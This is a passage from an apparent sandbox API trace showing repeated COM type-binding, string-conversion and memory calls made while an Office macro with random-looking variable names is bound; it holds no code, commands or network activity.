ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.803] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5372eca | out: _Dst=0x343ddc) returned 0x0 [0060.803] CRetailMalloc_Free () returned 0x7730201 [0060.803] ITypeComp:RemoteBind (in: This=0x87ce890, szName="E1syLK", lHashVal=0x10e55d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x520 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x520) returned 0x0 [0060.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372ea6, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="E1syLK") returned 7 [0060.803] ITypeComp:RemoteBind (in: This=0x87ce668, szName="E1syLK", lHashVal=0x10e55d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x520 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x520) returned 0x0 [0060.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372ea6, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="E1syLK") returned 7 [0060.804] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="E1syLK", lHashVal=0x10e55d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x520 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x520) returned 0x0 [0060.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372ea6, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="E1syLK") returned 7 [0060.804] ITypeComp:RemoteBind (in: This=0x87cef08, szName="E1syLK", lHashVal=0x10e55d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x520 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x520) returned 0x0 [0060.804] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.804] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x5372ea6 | out: _Dst=0x87fcbd8) returned 0x0 [0060.805] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0832, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_E1syLK") returned 14 [0060.805] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_E1syLK", lHashVal=0x105fc7, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.805] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5372ea6 | out: _Dst=0x343ddc) returned 0x0 [0060.805] CRetailMalloc_Free () returned 0x7730201 [0060.805] ITypeComp:RemoteBind (in: This=0x87ce890, szName="BDqNKeS2a", lHashVal=0x102e92, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x524 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x524) returned 0x0 [0060.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372ef2, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="BDqNKeS2a") returned 10 [0060.806] ITypeComp:RemoteBind (in: This=0x87ce668, szName="BDqNKeS2a", lHashVal=0x102e92, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x524 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x524) returned 0x0 [0060.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372ef2, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="BDqNKeS2a") returned 10 [0060.806] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="BDqNKeS2a", lHashVal=0x102e92, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x524 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x524) returned 0x0 [0060.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372ef2, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="BDqNKeS2a") returned 10 [0060.806] ITypeComp:RemoteBind (in: This=0x87cef08, szName="BDqNKeS2a", lHashVal=0x102e92, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x524 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x524) returned 0x0 [0060.807] CRetailMalloc_Alloc () returned 0x61e2008 [0060.807] _mbscpy_s (in: _Dst=0x61e2008, _DstSizeInBytes=0xa, _Src=0x5372ef2 | out: _Dst=0x61e2008) returned 0x0 [0060.807] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea085e, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_BDqNKeS2a") returned 17 [0060.808] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_BDqNKeS2a", lHashVal=0x102856, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.808] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5372ef2 | out: _Dst=0x343ddc) returned 0x0 [0060.808] CRetailMalloc_Free () returned 0xffff0001 [0060.808] ITypeComp:RemoteBind (in: This=0x87ce890, szName="YyPcO", lHashVal=0x103e3e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x526 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x526) returned 0x0 [0060.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f1a, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="YyPcO") returned 6 [0060.808] ITypeComp:RemoteBind (in: This=0x87ce668, szName="YyPcO", lHashVal=0x103e3e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x526 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x526) returned 0x0 [0060.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f1a, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="YyPcO") returned 6 [0060.808] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="YyPcO", lHashVal=0x103e3e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x526 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x526) returned 0x0 [0060.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f1a, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="YyPcO") returned 6 [0060.809] ITypeComp:RemoteBind (in: This=0x87cef08, szName="YyPcO", lHashVal=0x103e3e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x526 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x526) returned 0x0 [0060.809] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.809] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x6, _Src=0x5372f1a | out: _Dst=0x87fcbd8) returned 0x0 [0060.810] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea088e, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_YyPcO") returned 13 [0060.810] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_YyPcO", lHashVal=0x10022b, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.810] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5372f1a | out: _Dst=0x343ddc) returned 0x0 [0060.810] CRetailMalloc_Free () returned 0x7730201 [0060.810] ITypeComp:RemoteBind (in: This=0x87ce890, szName="b3gEJS", lHashVal=0x102b1f, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x528 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x528) returned 0x0 [0060.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f3e, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="b3gEJS") returned 7 [0060.810] ITypeComp:RemoteBind (in: This=0x87ce668, szName="b3gEJS", lHashVal=0x102b1f, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x528 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x528) returned 0x0 [0060.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f3e, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="b3gEJS") returned 7 [0060.810] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="b3gEJS", lHashVal=0x102b1f, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x528 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x528) returned 0x0 [0060.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f3e, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="b3gEJS") returned 7 [0060.811] ITypeComp:RemoteBind (in: This=0x87cef08, szName="b3gEJS", lHashVal=0x102b1f, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x528 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x528) returned 0x0 [0060.811] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.811] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x5372f3e | out: _Dst=0x87fcbd8) returned 0x0 [0060.812] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea08ba, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_b3gEJS") returned 14 [0060.812] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_b3gEJS", lHashVal=0x10a5c8, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.812] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5372f3e | out: _Dst=0x343ddc) returned 0x0 [0060.812] CRetailMalloc_Free () returned 0x7730201 [0060.812] ITypeComp:RemoteBind (in: This=0x87ce890, szName="cPTaAje", lHashVal=0x102d31, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x52a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x52a) returned 0x0 [0060.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f62, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="cPTaAje") returned 8 [0060.812] ITypeComp:RemoteBind (in: This=0x87ce668, szName="cPTaAje", lHashVal=0x102d31, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x52a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x52a) returned 0x0 [0060.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f62, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="cPTaAje") returned 8 [0060.813] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="cPTaAje", lHashVal=0x102d31, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x52a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x52a) returned 0x0 [0060.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f62, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="cPTaAje") returned 8 [0060.813] ITypeComp:RemoteBind (in: This=0x87cef08, szName="cPTaAje", lHashVal=0x102d31, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x52a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x52a) returned 0x0 [0060.813] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.813] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x5372f62 | out: _Dst=0x87fcbd8) returned 0x0 [0060.814] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea08e6, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_cPTaAje") returned 15 [0060.814] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_cPTaAje", lHashVal=0x1030b5, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.814] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5372f62 | out: _Dst=0x343ddc) returned 0x0 [0060.814] CRetailMalloc_Free () returned 0x7730201 [0060.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f86, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="z7VJ3yI") returned 8 [0060.814] ITypeComp:RemoteBind (in: This=0x87ce890, szName="z7VJ3yI", lHashVal=0x1066cc, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x52c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x52c) returned 0x0 [0060.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f86, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="z7VJ3yI") returned 8 [0060.815] ITypeComp:RemoteBind (in: This=0x87ce668, szName="z7VJ3yI", lHashVal=0x1066cc, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x52c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x52c) returned 0x0 [0060.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f86, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="z7VJ3yI") returned 8 [0060.815] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="z7VJ3yI", lHashVal=0x1066cc, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x52c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x52c) returned 0x0 [0060.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372f86, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="z7VJ3yI") returned 8 [0060.815] ITypeComp:RemoteBind (in: This=0x87cef08, szName="z7VJ3yI", lHashVal=0x1066cc, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x52c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x52c) returned 0x0 [0060.816] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.816] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x5372f86 | out: _Dst=0x87fcbd8) returned 0x0 [0060.816] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0912, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_z7VJ3yI") returned 15 [0060.816] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_z7VJ3yI", lHashVal=0x106a50, wFlags=0x3, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.816] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5372f86 | out: _Dst=0x343ddc) returned 0x0 [0060.816] CRetailMalloc_Free () returned 0x7730201 [0060.817] ITypeComp:RemoteBind (in: This=0x87ce890, szName="uqDp3ntfZ", lHashVal=0x10df55, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x52e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x52e) returned 0x0 [0060.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372faa, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="uqDp3ntfZ") returned 10 [0060.817] ITypeComp:RemoteBind (in: This=0x87ce668, szName="uqDp3ntfZ", lHashVal=0x10df55, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x52e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x52e) returned 0x0 [0060.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372faa, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="uqDp3ntfZ") returned 10 [0060.817] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="uqDp3ntfZ", lHashVal=0x10df55, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x52e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x52e) returned 0x0 [0060.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372faa, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="uqDp3ntfZ") returned 10 [0060.818] ITypeComp:RemoteBind (in: This=0x87cef08, szName="uqDp3ntfZ", lHashVal=0x10df55, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x52e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x52e) returned 0x0 [0060.818] CRetailMalloc_Alloc () returned 0x61e2008 [0060.818] _mbscpy_s (in: _Dst=0x61e2008, _DstSizeInBytes=0xa, _Src=0x5372faa | out: _Dst=0x61e2008) returned 0x0 [0060.818] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea093e, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_uqDp3ntfZ") returned 17 [0060.818] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_uqDp3ntfZ", lHashVal=0x10d919, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.819] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5372faa | out: _Dst=0x343ddc) returned 0x0 [0060.819] CRetailMalloc_Free () returned 0xffff0001 [0060.819] ITypeComp:RemoteBind (in: This=0x87ce890, szName="IHOJUBplu", lHashVal=0x10b48d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x530 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x530) returned 0x0 [0060.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372fd2, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="IHOJUBplu") returned 10 [0060.819] ITypeComp:RemoteBind (in: This=0x87ce668, szName="IHOJUBplu", lHashVal=0x10b48d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x530 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x530) returned 0x0 [0060.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372fd2, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="IHOJUBplu") returned 10 [0060.819] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="IHOJUBplu", lHashVal=0x10b48d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x530 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x530) returned 0x0 [0060.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372fd2, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="IHOJUBplu") returned 10 [0060.820] ITypeComp:RemoteBind (in: This=0x87cef08, szName="IHOJUBplu", lHashVal=0x10b48d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x530 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x530) returned 0x0 [0060.820] CRetailMalloc_Alloc () returned 0x61e2008 [0060.820] _mbscpy_s (in: _Dst=0x61e2008, _DstSizeInBytes=0xa, _Src=0x5372fd2 | out: _Dst=0x61e2008) returned 0x0 [0060.820] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.821] 